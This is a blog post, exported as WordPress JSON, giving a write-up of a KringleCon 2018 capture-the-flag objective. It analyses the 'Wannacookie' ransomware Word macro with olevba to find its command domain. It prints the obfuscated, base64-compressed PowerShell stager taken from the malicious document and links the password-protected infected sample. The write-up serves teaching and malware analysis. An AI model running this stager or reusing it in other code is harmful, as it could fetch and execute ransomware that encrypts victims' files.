{"id":381,"date":"2019-01-17T06:59:44","date_gmt":"2019-01-17T06:59:44","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=381"},"modified":"2019-01-17T06:59:50","modified_gmt":"2019-01-17T06:59:50","slug":"objective-9-2-identify-the-domain","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/","title":{"rendered":"
Objective 9.2: Identify the Domain<\/center>"},"content":{"rendered":"\n

In this Objective, we need to identify the domain the malware communicates.<\/p>\n\n\n\n

If we have completed Sleigh Bell Lottery Cranberry Pi terminal by Shinny Upatree, then we get a hint which is.
\n“Sweet candy goodness – I win! Thank you so much!
\nHave you heard that Kringle Castle was hit by new ransomware called Wannacookie?
\nSeveral elves reported receiving a cookie recipe Word doc. When opened, a PowerShell screen flashed by, and their files were encrypted.
\nMany elves were affected, so Alabaster went to see if he could help out.
\nI hope Alabaster watched the PowerShell Malware talk at KringleCon before he tried analysing Wannacookie on his computer.
\nAn elf I follow online said he analysed Wannacookie and that it communicates over DNS.
\nHe also said that Wannacookie transfers files over DNS and that it looks like it grabs a public key this way.
\nAnother recent ransomware made it possible to retrieve crypto keys from memory. Hopefully the same is true for Wannacookie!
\nOf course, this all depends on how the key was encrypted and managed in memory. Proper public key encryption requires a private key to decrypt.
\nPerhaps there is a flaw in the wannacookie author’s DNS server that we can manipulate to retrieve what we need.
\nIf so, we can retrieve our keys from memory, decrypt the key, and then decrypt our ransomed files.”<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So, we know it’s a .doc file, and it’s malware related, (I’m thinking macros here).ZIP file (https:\/\/www.holidayhackchallenge.com\/2018\/challenges\/CHOCOLATE_CHIP_COOKIE_RECIPE.zip) (With the password: elves)
WARING this file is infected, the opening is doing so at your own risk!<\/strong><\/p>\n\n\n\n

So here is that evil cookie file! (Even do cookies are nice. Is the cookie a lie?) <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n

Uploading the file to (https:\/\/www.virustotal.com) we can see in the details tab that 53% is macros.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We can use olevba<\/a>“olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc).”
We need to find the domain name that the malware is using to communicate with that’s within the macros, and I’m guessing PowerShell.<\/p>\n\n\n\n

\u2026\u2026.. However, I wonder what would happen if we open the file? Open the file within a VM (virtual machine) not connected to the internet.<\/p>\n\n\n\n

Well, I guess that worked too! <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Moreover, there is the domain name\/answer we needed! “erohetfanu.com” I’m guessing the PowerShell failed to connect to the server (Since the VM has no internet access) and giving us this error, showing the URL!
\nIf this had failed, then olevba would have been used. Let’s use the quick and dirty method? Ha!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n

However, let’s use olevba, as we need the code later on to complete Kringlecon.<\/p>\n\n\n\n

First, we need to install Olevba; a guide found here<\/a>, install on Linux (it works on Windows too!).
<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Next, we need to use Olevba which in Linux is just pointing it to the file “olevba CHOCOLATE_CHIP_COOKIE_RECIPE.docm”, now we get some output, and it’s the PowerShell script retrieved from Olevba.
\n<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We now need to run it, so it’s back to Windows (Yes, I’m aware you can run PowerShell within Linux using pwsh, but I need to fix mine, hence why Windows used).
\nBefore running this PowerShell script don’t forget to remove “iex”, this makes the script somewhat harmless.
\n“The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.” (https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-6)<\/p>\n\n\n\n

Which will leave us with this:<\/p>\n\n\n\n

 \"sal a New-Object; (a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2\/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA\/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im\/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJcJyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH\/kMy9gXREohG'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\".<\/code><\/pre>\n\n\n\n

 So if we run it within Windows, we get this output<\/a>.
 <\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
Moreover, that’s how we can get the code which is needed later on with Kringlecon.<\/p>\n\n\n\n
Also, here<\/a> is the cookie recipe. Don’t worry it’s macro-free!<\/p>\n","protected":false},"excerpt":{"rendered":"
In this Objective, we need to identify the domain the malware communicates. If we have completed Sleigh Bell Lottery Cranberry Pi terminal by Shinny Upatree, then we get a hint which is. “Sweet candy goodness…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[10],"tags":[13,14,12],"class_list":["post-381","post","type-post","status-publish","format-standard","hentry","category-kringlecon-2018","tag-13","tag-ctf","tag-kringlecon"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-69","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=381"}],"version-history":[{"count":2,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381\/revisions"}],"predecessor-version":[{"id":394,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381\/revisions\/394"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}